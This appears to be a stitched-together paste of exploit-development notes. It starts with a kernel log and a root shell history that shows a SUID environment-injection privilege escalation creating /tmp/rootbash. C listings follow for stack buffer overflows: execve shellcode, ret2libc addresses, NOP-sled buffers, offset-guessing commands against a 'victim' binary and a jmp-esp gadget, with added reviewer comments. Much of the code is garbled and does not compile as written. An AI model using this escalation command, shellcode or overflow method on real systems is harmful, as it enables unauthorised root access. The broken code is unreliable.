1219Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1220Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1221Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1222Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1223Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1224Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1225Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1226Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1227Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1228Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1229Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1230Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1231Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1232Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1233Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1234Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1235Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1236Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1237Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1238Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1239Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1240Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1241Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1242Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1243Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1244Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1245Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1246Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1247Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1248Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1249Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1250Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1251Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1252Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1253Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1254Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1255Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1256Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1257Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1258Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1259Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1260Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1261Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1262Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1263Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1264Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1265Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1266Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1267Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1268rootbash-4.1# history | tail -100
1269 115 ls
1270 116 cat /etc/hosts.allow
1271 117 arp -A
1272 118 arp
1273 119 arp -vpn
1274 120 arp -vn
1275 121 netstat -A
1276 122 netstat -r
1277 123 netstat -i
1278 124 netstat -g
1279 125 netstat -e
1280 126 netstat -l
1281 127 netstat
1282 128 man netstat
1283 129 netstat -tcp
1284 130 netstat -udp
1285 131 netstat -p tcp
1286 132 netstat -p udp
1287 133 netstat -p tcp 22
1288 134 netstat -p 22
1289 135 netstat -p 80
1290 136 netstat -p tcp
1291 137 netstat -p udp
1292 138 ls
1293 139 clear
1294 140 dmesg | grep /var/log
1295 141 dmesg | grep /var/log/messages.log
1296 142 cd /var/log
1297 143 ls
1298 144 dmesg | grep /var/log/syslog | less
1299 145 dmesg | grep /var/log/syslog | more
1300 146 dmesg | grep /var/log/syslog
1301 147 ls -la /var/log/syslog
1302 148 chmod 755 /var/log/syslog
1303 149 ls -la /var/log/syslog
1304 150 ls
1305 151 tail -f /var/log/syslog
1306 152 tail -f /var/log/syslog | more
1307 153 dmesg | grep /var/log/syslog > w0rd.txt
1308 154 cat w0rd.txt
1309 155 ls
1310 156 chmod 755 w0rd.txt
1311 157 ls
1312 158 cat w0rd.txt
1313 159 ls -la w0rd.txt
1314 160 rm -f w0rd.txt
1315 161 ls
1316 162 cat /var/log/syslog
1317 163 cat /var/log/syslog | less foo.txt
1318 164 cat /var/log/syslog | grep /usr/local/bin
1319 165 cat /var/log/syslog | grep /tmp
1320 166 cat /var/log/syslog | grep /rootbash
1321 167 ls
1322 168 cat /var/log/syslog
1323 169 ls
1324 170 dmesg /var/log/auth.log.2.gz
1325 171 cat /var/log/wtmp
1326 172 cat /var/run/utmp
1327 173 who am i
1328 174 users
1329 175 last
1330 176 finger
1331 177 cat /var/log/secure
1332 178 cat /var/log/auth.log
1333 179 head -5 /var/log/auth.log
1334 180 fc -l -10
1335 181 nano .bash_history
1336 182 history 100
1337 183 ls -la
1338 184 who am i
1339 185 cd /
1340 186 ls
1341 187 cd /home
1342 188 ls
1343 189 cd user/
1344 190 ls
1345 191 cd ..
1346 192 ls
1347 193 cat /etc/passwd
1348 194 cat /etc/shadow
1349 195 exit
1350 196 /usr/local/bin/suid-env2
1351 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1352 198 /tmp/rootbash -p
1353 199 exit
1354 200 cls
1355 201 exit
1356 202 ls
1357 203 cd tools
1358 204 ls
1359 205 /tmp/rootbash -p
1360 206 exit
1361 207 su newroot
1362 208 whoami
1363 209 cat /etc/passwd
1364 210 su root
1365 211 exit
1366 212 tail -f /var/log/messages
1367 213 cat /var/log/messages
1368 214 history | tail -100
1369rootbash-4.1# id
1370uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1371rootbash-4.1# whoami
1372root
1373rootbash-4.1# ls -la /home/user/bmillakid
1374rootbash-4.1# cd /home
1375rootbash-4.1# ls
1376user
1386#include <stdlib.h>
1387
// Defaults for the two values main() reads from the command line: the
// offset subtracted from the sampled stack address, and the buffer size.
1388#define offset_size 0
1389#define buffer-size 600
1390
// Three 4-byte values the author labels system(), exit() and "binsh":
// presumably absolute 32-bit addresses inside one particular process image,
// stored least-significant byte first. Hard-coded addresses like these only
// hold while the target's memory layout is predictable; address-space
// randomisation makes them differ from run to run.
1391char sc[] =
1392"\xc0\xf2\x03\x42" //system()
1393"\x02\x9b\xb0\x42" //exit()
1394"\xa0\x8a\xb2\x42" //binsh
1395
// Inline-asm helper whose operands are %esp and %eax. There is no return
// statement, so whatever the caller receives is whatever the asm leaves in
// the return register (presumably the current stack pointer; the C language
// itself does not guarantee this).
1396unsigned llong find_start(void) {
1397
1398 __asm__("mov1 %esp,%eax");
1399}
1400
// Builds one environment string of the form BUF=... and starts /bin/bash
// with it exported.
//   argv[1]  optional buffer size (default buffer_size)
//   argv[2]  optional offset subtracted from the value find_start() returns
// The buffer is filled with repeated copies of that address, the bytes of sc
// are written starting 4 bytes in, and the first four bytes are finally
// overwritten with "BUF=".
// NOTE(review): buff is never assigned in this listing, so every write
// through ptr/buff is undefined behaviour, and both atoi() results are used
// unchecked. Read this as study notes rather than a buildable program.
// Defensive context: the approach depends on another process's memory
// layout matching the value guessed here, which ASLR is designed to break.
1401int main(int argc, char *argv[])
1402{
1403
1404 char *buff, *ptr;
1405 long *addr_ptr, addr;
1406 int offset=offset_size, bsize=buffer_size;
1407 int i;
1408
1409 if (argc > 1) bsize = atoi(argv[1]);
1410 if (argc > 2) offset = atoi(argv[2]);
1411
1412 addr = find_start() -offset;
1413 ptr = buff;
1414 addr_ptr= (long *) ptr;
1415 for (i = 0; i < bsize; i+=4)
1416 *(addr_ptr++) =addr;
1417
1418 ptr +=4;
1419
1420 for (i = 0; i < strlen(sc); i++)
1421 *(ptr++) =sc[i];
1422
1423buff[bsize -1] = '\0';
1424
1425memcpy(buff,"BUF=",4);
1426putenv(buff);
1427system("/bin/bash");
1428
1429}
1430
1431
1432specific syscall number is loaded into eax
1433the syscall's arguments are placed into other registers
1434instruction int 0x80 is executed
1435CPU switches to kernel mode
1436syscall function is executed
1437
1438#include <stdlib.h>
1439
// Defaults for main()'s two optional arguments, plus the filler byte (0x90)
// that main() writes into the first half of the buffer.
//
// shellcode[] is an opaque run of machine-code bytes and is not decoded
// here. Two things are readable directly from the literal: the last seven
// bytes (2f 62 69 6e 2f 73 68) are the ASCII text "/bin/sh", and cd 80 is
// the encoding of the `int 0x80` instruction described in the notes above.
// Those byte runs are what a content signature for this sample would key on.
1440#define DEFAULT_OFFSET 0
1441#define DEFAULT_BUFFER_SIZE 512
1442#define NOP 0x90
1443
1444char shellcode[] =
1445
1446
1447
1448“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
1449
1450
1451
1452
// Inline-asm helper with operands %esp and %eax and no return statement;
// the caller's result is whatever the asm leaves in the return register
// (presumably the stack pointer, going by the function name).
1453 unsigned long get_sp(void) {
1454 __asm__("move1 %esp,%eax");
1455 }
1456
// Variant of the environment-string builder that allocates its buffer.
//   argv[1]  optional buffer size (default DEFAULT_BUFFER_SIZE)
//   argv[2]  optional offset subtracted from get_sp()'s result
// Visible layout of the bsize-byte buffer: an address-fill loop over the
// whole buffer, then the first half overwritten with NOP bytes, then the
// shellcode bytes copied to a position computed from bsize/2 and
// strlen(shellcode)/2, a terminating NUL in the last byte, and finally
// "BUF=" over the first four bytes. The result is exported with putenv()
// and /bin/bash is started.
// NOTE(review): the address-fill statement and the `ptr = buff + ...` line
// are garbled as pasted (wrong identifier, unbalanced parentheses), and the
// atoi() results are unchecked, so small or negative sizes are not handled.
// Defensive context: a filler run like this only matters when the stack is
// executable and its address is guessable; non-executable stacks and ASLR
// remove both assumptions.
1457 void main(int argc, char *argv[])
1458
1459 {
1460
1461 char *buff, *ptr;
1462 long *addr_ptr, addr;
1463 int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
1464 int i;
1465
1466 if (argc > 1) bsize = atoi (argv[1]);
1467 if (argc > 2) offset = atoi (argv[2]);
1468
1469 if (!(buff = malloc(bsize))) {
1470 printf("fuck off\n");
1471 exit(0);
1472 }
1473
1474 addr = get_sp() - offset;
1475 printf("use this: 0x%x\n", addr);
1476
1477 ptr = buff;
1478 addr_ptr = (long *) ptr;
1479 for (i =0 ; i < bsize; i+=4)
1480 *(addr+ptr++) = addr;
1481
1482 for (i = 0; i < bsize/2; i++)
1483 buff[i] = NOP;
1484
1485 ptr = buff + ((bsize/2 - (strlen(shellcode)/2));
1486 for (i = 0; i < strlen(shellcode); i++)
1487 *(ptr++) = shellcode[i];
1488
1489 buff[bsize - 1] = '\0';
1490
1491 memcpy(buff, "BUF=",4);
1492 putenv(buff);
1493 system("/bin/bash");
1494
1495}
1496//shell.c
/*
 * Replaces the current process image with /bin/sh.
 *
 * The argument vector holds the program path followed by a null
 * terminator, and a null environment pointer is passed. exit(0) runs only
 * if execve() returns, so a failed exec is still reported as status 0.
 */
int main() {
    char *name[2] = { "/bin/sh", 0x0 };

    execve(name[0], name, 0x0);
    exit (0);
}
1505
1506
1507//shellcode.c
// Opaque machine-code bytes, not decoded here. The trailing seven bytes
// (2f 62 69 6e 2f 73 68) are the ASCII text "/bin/sh" and cd 80 encodes
// `int 0x80`; both are stable byte runs a scanner can match on.
1508char shellcode[] =
1509“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1510
// Test harness for the byte array: stores the address of shellcode through
// the pointer `ret`.
// NOTE(review): `ret` is never declared in this listing (the first statement
// has a type but no variable name), so it does not compile as pasted. The
// visible arithmetic takes the address of a local and adds two ints, i.e. it
// aims at a slot above that local in main's own frame, presumably the saved
// return address; which slot that really is depends on compiler and flags.
// Running bytes out of a data array also needs that memory to be
// executable, which non-executable-data protection prevents.
1511int main()
1512{
1513
1514 int = (int *)&ret +2;
1515 (*ret) = (int)shellcode;
1516
1517}
1518
1519[ask application to force input, causing the address we supplied to be loaded into EIP
1520,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1521
1522when RET is popped off the stack and loaded into EIP, the first instruction of the shellcode is executed
1523
1524
1525Location pointer
1526
1527// find_start.c
// Inline-asm helper with operands %esp and %eax. It has no return
// statement; the value main() prints is whatever the asm leaves in the
// return register (presumably the stack pointer at the time of the call).
1528unsigned long find_start(void)
1529{
1530
1531 __asm__("move1 %esp, %eax");
1532
1533}
1534
// Prints the value returned by find_start().
// NOTE(review): "%n" is not an output conversion. printf treats the matching
// argument as a pointer and stores the number of bytes written so far
// through it; here the argument is an integer, so the call is undefined
// behaviour rather than a hex dump. Other listings on this page print the
// same kind of value with "%x".
1535int main()
1536{
1537
1538 printf("0x%n\n",find_start());
1539}
1540
1541[putting programs into arrays with no bounds checking]
1542 [has to be owned by root in suid]
1543
1544sudo chown root victim
1545sudo chmod +s victim
1546
1547./victim <shellcode>padding>choice-of-returnaddress
1548
1549./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
1550
1551./victim $(printf "%0512x" 0)
1552./victim $(printf %0516x" 0)
1553./victim $(printf %0520x" 0)
1554./victim $(printf %0524x" 0)
1555Segfault
1556./victim $(printf %0528x" 0)
1557Segfault
1558[we can tell the saved return address is probably 524-528 bytes
1559shellcode = [40]
1560padding = [480]
1561saved ret address [0xbffffad8]
1562
1563./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
1564[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
1565
1566[little endian]
1567
1568./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
1569Illegal instruction
1570
15718%0484x\x38\xfa\xff\xbf")
1572
1573[program to guess offset between start of the program and first instruction for shellcode]
1574
1575#include <stdlib.h>
1576
// Defaults for main()'s optional offset and buffer-size arguments, followed
// by the same opaque byte array used elsewhere on this page (trailing bytes
// 2f 62 69 6e 2f 73 68 are ASCII "/bin/sh"; cd 80 encodes `int 0x80`).
// NOTE(review): the declarator `char sc[] =` is repeated on the array line
// as pasted.
1577#define offset_size 0
1578#define buffer_size 512
1579
1580
1581char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1582
// Inline-asm helper with operands %esp and %eax and no return statement;
// the caller's result is whatever the asm leaves in the return register
// (presumably the stack pointer).
1583unsigned long find_start(void) {
1584
1585 __asm__(*mov1 %esp,%eax");
1586
1587}
1588
// Environment-string builder used, per the note above it, to try different
// offsets.
//   argv[1]  optional buffer size (default buffer_size)
//   argv[2]  optional offset subtracted from find_start()'s result
// Fills the buffer with repeated copies of the computed address, writes the
// bytes of sc starting 4 bytes in, terminates the buffer, overwrites the
// first four bytes with "BUF=", exports it with putenv() and runs a shell
// through system().
// NOTE(review): buff is never assigned in this listing, so the writes
// through it are undefined behaviour; "%n" in the printf call stores
// through its argument instead of printing it (the argument here is an
// integer, not a pointer); atoi() results are unchecked.
// Defensive context: each run is a guess at another process's stack
// address, which is what stack-address randomisation is meant to defeat.
1589int main(int argc, char *argv[])
1590{
1591
1592 char *buff, *ptr;
1593 long *addr_ptr, addr;
1594 int offset=offset_size, bsize=buffer_size;
1595 int i;
1596
1597 if (argc > 1) bsize = atoi(argv[1]);
1598 if (argc > 2) offset = atoi(argv[2]);
1599
1600 addr = find_start() - offset;
1601 printf("attempt address: 0x%n\n",addr);
1602
1603 ptr = buff;
1604 addr_ptr =(long *) ptr;
1605 for (i - 0; i < bsize; i+=4)
1606 * (addr_ptr++) = addr;
1607
1608 ptr +=4;
1609
1610 for (i = 0; i < strlen(sc); i++)
1611 *(ptr++) = sc[i];
1612
1613 buff[bsize - 1] = '\0';
1614
1615 memcpy(buff, "BUF=",4);
1616 putenv(buff);
1617 system(" /bin/bash");
1618
1619}
1620
1621
1622[NOP]
1623
1624
1625
1626#include <stdlib.h>
1627
// Defaults for main()'s two optional arguments and the 0x90 filler byte,
// followed by the same opaque byte array seen in the earlier listings
// (trailing bytes 2f 62 69 6e 2f 73 68 are ASCII "/bin/sh").
// NOTE(review): as pasted the array line carries two declarators and the
// literal is broken across a line in the middle of an escape sequence.
1628#define DEFAULT_OFFSET 0
1629#define DEFAULT_BUFFER_SIZE 512
1630#define NOP 0x90
1631
1632
1633 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
1634\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1635
// Inline-asm helper with operands %esp and %eax and no return statement;
// the caller's result is whatever the asm leaves in the return register
// (presumably the stack pointer, going by the function name).
1636unsigned long get_sp(void) {
1637 __asm__("mov1 %esp,%eax");
1638}
1639
// Allocating variant of the environment-string builder, with the whole body
// collapsed onto one line as pasted.
//   argv[1]  optional buffer size (default DEFAULT_BUFFER_SIZE)
//   argv[2]  optional offset subtracted from get_sp()'s result
// Visible steps: malloc(bsize) with a message and exit(0) on failure; print
// the computed address; fill the buffer with that address; overwrite the
// first half with NOP bytes; copy shellcode to a position centred on
// bsize/2; NUL-terminate; write "BUF=" over the first four bytes; putenv()
// and system("/bin/bash").
// NOTE(review): the string and character literals use typographic quotes in
// this paste, and the atoi() results are unchecked.
// Defensive context: this layout assumes an executable, predictably placed
// stack; non-executable stacks and ASLR remove both assumptions.
1640void main(int argc, char *argv[])
1641
1642{
1643
1644 char *buff, *ptr;
1645
1646 long *addr_ptr, addr;int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;int i;if (argc > 1) bsize = atoi(argv[1]);if (argc > 2) offset = atoi(argv[2]);if (!(buff = malloc(bsize))) {printf(“Can’t allocate memory.\n”);exit(0);}addr = get_sp() - offset;printf(“Using address: 0x%x\n”, addr);ptr = buff;addr_ptr = (long *) ptr;for (i = 0; i < bsize; i+=4)*(addr_ptr++) = addr;for (i = 0; i < bsize/2; i++)buff[i] = NOP;ptr = buff + ((bsize/2) - (strlen(shellcode)/2));for (i = 0; i < strlen(shellcode); i++)*(ptr++) = shellcode[i];buff[bsize - 1] = ‘\0’;memcpy(buff,”BUF=”,4);putenv(buff);system(“/bin/bash”);}
1647
1648
1649#include <stdio.h>
1650#include <stdlib.h>
1651
// Contains a single inline-asm `jmp *%esp`, which the author's comment calls
// a gadget. Nothing in this listing calls the function, so it appears to
// exist only so that those instruction bytes are present in the executable:
// a deliberately weakened lab target, not something to leave in shipped code.
// NOTE(review): as pasted the body is closed with `{` instead of `}`.
1652void jumpesp(){
1653 __asm__("jmp *%esp"); //gadget to jump to esp
1654{
1655
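/*
 * Copy the caller's string into a fixed 1000-byte stack buffer.
 *
 * The original passed strlen(arg) straight to memcpy(), so any argument of
 * 1000 bytes or more was written past the end of buf and over the rest of
 * the stack frame. The argument comes from argv[1] in main(), i.e. from
 * whoever starts the program, so the length must be bounded here.
 *
 * arg: NUL-terminated input; NULL is ignored.
 * Input longer than the buffer is truncated to sizeof buf - 1 bytes and the
 * copy is always NUL-terminated.
 *
 * NOTE(review): memcpy() and strlen() are declared in <string.h>, which
 * this listing does not include.
 */
void copy(char *arg) {
    char buf[1000];
    size_t len;

    if (arg == NULL) {
        return;
    }

    len = strlen(arg);
    if (len >= sizeof buf) {
        len = sizeof buf - 1;   /* leave room for the terminator */
    }

    memcpy(buf, arg, len);
    buf[len] = '\0';
}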
1660
/* Entry point: hands the first command-line argument, if any, to copy(). */
int main(int argc, char **argv) {
    /* Nothing to do when the program is started without arguments. */
    if (argc <= 1) {
        return 0;
    }

    copy(argv[1]);
    return 0;
}
1668
1669
1670
1671---snip---